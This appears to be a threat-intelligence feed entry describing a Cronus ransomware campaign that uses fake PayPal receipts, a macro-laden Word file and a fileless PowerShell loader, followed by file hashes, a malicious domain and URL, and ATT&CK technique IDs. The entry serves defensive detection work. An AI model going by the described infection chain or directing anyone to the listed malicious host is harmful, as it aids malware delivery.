Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
Aug. 7, 2024, 8:37 a.m.
Tags
External References
Description
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This loader employs reflective DLL loading to execute the fileless ransomware payload directly in memory, evading disk-based detection. The ransomware exhibits various malicious behaviors, such as enumerating and encrypting specific file types, terminating processes, establishing persistence, and manipulating clipboard data.
Date
Published: Aug. 7, 2024, 8:32 a.m.
Created: Aug. 7, 2024, 8:32 a.m.
Modified: Aug. 7, 2024, 8:37 a.m.
Indicators
dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3
afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987
9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3
629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53
42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad
https://eternal.lol/file/
eternal.lol
Attack Patterns
Cronus Ransomware
Cronus
T1491.001
T1565.002
T1055.012
T1059.005
T1059.001
T1547.001
T1204.002
T1486
T1057
T1566.001
T1083